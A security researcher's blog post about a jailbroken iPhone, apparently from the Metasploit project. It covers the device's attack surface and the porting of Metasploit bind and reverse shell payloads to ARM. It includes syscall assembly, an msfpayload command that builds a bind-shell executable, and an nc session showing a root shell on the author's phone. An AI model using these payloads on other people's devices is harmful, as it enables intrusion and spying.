A root shell in my pocket (and maybe yours)

Last updated at Wed, 26 Jul 2017 17:05:55 GMT

After the recent price drop and toolchain release, I bit the bullet and bought a shiny new iPhone. The first thing I did is bypass activation, run jailbreak, and install the AppTapp Installer. Using the installer, I added OpenSSH and a VT-100 Terminal to the phone. Once I had shell access, I made a few observations:

1) The processor is actually decent. Compare the iPhone (400Mhz*) with the Nokia n770 (233mhz) or the Nokia n800 (320Mhz) and the choice of a handheld hacking device is a no-brainer. The (mostly) working toolchain, large amounts of storage (8Gb), and ease of use make this a great candidate for almost any security researcher "on-the-go". If you tweak the networking preferences file, you can set the signal quality limit down to "1", turning the "join a WiFi network" screen into a primitive stumbler (or just install Stumbler via AppTapp).

* The media widely reported the processor speed as 620Mhz and I repeated it here. Dan Moniz suggested I check the output of ioreg for the actual CPU speed, which is reported as 400Mhz (0084d717 == 0x17d78400 == 400000000).

2) EDGE network access is horribly slow, but it works. The downside is that the EDGE network provides the phone with a private address, on a point-to-point link, that is three hops away from a public IP range. For example, my phone's EDGE address is 10.x.x.x, its first hop is 172.16.x.x, its second hop is 10.x.x.x, and its third hop is also 10.x.x.x. The fourth hop is a 200.x.x.x address. Latency is between 180ms and 600ms, but averages around 200ms-250ms. I made a few attempts to discover other hosts in the private address space, in hopes of finding other EDGE devices, but instead only found a few scattered routers, switches, and servers.

The phone has been a fun time sink. I used the MobileSafari PDF viewer to read all of the recent Uninformed Journal articles. Metasploit 2 runs decently, even though the Terminal isn't the best interface for a screen of this size. Metasploit 3 should run, as soon as the toolchain is capable of building a working Ruby interpreter (yes, there is a Ruby package in AppTapp, yes its totally broken).  When that day comes, I hope the EDGE network can handle it :-)

Having a network-enabled root shell in my pocket is great, but being able to pop a root shell on someone else's iPhone is even better. A few things to keep in mind:

1) Every process runs as root. MobileSafari, MobileMail, even the Calculator, all run with full root privileges. Any security flaw in any iPhone application can lead to a complete system compromise. A rootkit takes on a whole new meaning when the attacker has access to the camera, microphone, contact list, and phone hardware. Couple this with "always-on" internet access over EDGE and you have a perfect spying device.

2) The mDNSResponder service runs by default. This service is also known by the names Bonjour, ZeroConf, and Rendezvous. When the iPhone is first sync'ed with iTunes, the hostname is changed. The default hostname becomes "User's iPhone", where "User" is Mac OS X user account used to perform the sync. If the iPhone is connected to a WiFi network, the mDNS service will advertise itself on the local network, exposing the user name of the iPhone's owner. So far, it doesn't look like the mDNS service responds to normal probes, so at least active discovery is less likely (maybe the sysctl parameter net.inet.udp.no_5353=1 has something to do with it).

3) The MobileMail application supports Microsoft Office document formats. It does this by using the OfficeImporter framework to convert these documents into a viewable form. This looks like a great target for file-format fuzzing and some late night reverse engineering.

4) Independent Security Evaluators demonstrated a code-execution vulnerability in the iPhone at Black Hat 2007. Their slides describe the exploit and shellcode development process. Since then, the toolchain and amount of public information has improved considerably.

The first step to iPhone exploits is platform support for the Metasploit Framework. To support a new platform, the architecture must be defined in rex/constants.rb. I added two new architectures, one for ARM little endian (armle), and another for ARM big endian (armbe), since many ARM chips can run in either mode.

The next step is figure out the payloads. Fortunately, I wrote many of Metasploit's PowerPC modules for Mac OS X. The iPhone uses the same syscall numbers, so porting payloads is straightforward. On Mac OS X PowerPC, the system call number is placed into r0 and the arguments start at register r3. On the iPhone, the system call number is placed into r12 and the arguments start at r0. 

For example, the "exit" system call on PowerPC looks like:

 li r0, 1 ; SYS_exit
 li r3, 255 ; Exit code 255
 sc ; System call

By comparison, the same code on the iPhone looks like:

 mov r12, #1 ; SYS_exit
 mov r0, #255 ; Exit code 255
 swi 128 ; System call

         
With only a few headaches, I was able to port the bind shell and reverse shell payloads to the iPhone. I added a very simple nop generator to match. At this point, its possible to generate working iPhone shellcode using the trunk version of Metasploit 3. For kicks, I rewrote Charlie Millers's "vibrate" shellcode (listed in the ISE slides) as well. The Metasploit version is a little bit smaller and uses the correct address for Firmware 1.02. The next step is finish my XOR (well, EOR on ARM) encoder, and start playing with thumb mode (16 bit instructions). Since shellcode is no fun unless you can do something with it, I added support for iPhone executables to the msfpayload command. This allows you to generate stand-alone bind/reverse shell executables using the following syntax:

 $ msfpayload osx/armle/shell_bind_tcp LPORT=4444 X > iphone_bindshell.bin

This binary can be copied to the iPhone using SSH or iPHUC/iPhoneTool and executed.

$ ssh root@192.168.0.125
# chmod x iphone_bindshell.bin
# ./iphone_bindshell.bin
---
$ nc -vvn 192.168.0.125 4444
(UNKNOWN) [192.168.0.125] 4444 (krb524) open
id
uid=0 euid=1 gid=0(wheel) groups=0(wheel)
uname -a
Darwin Metasploit Developer's iPhone 9.0.0d1 
Darwin Kernel Version 9.0.0d1: Fri Jun 22 00:38:56 PDT 2007; 
root:xnu-933.0.1.178.obj~1/RELEASE_ARM_S5L8900XRB iPhone1,1 Darwin

Once the XOR encoder is done, the only step left is to find the bugs and write the exploits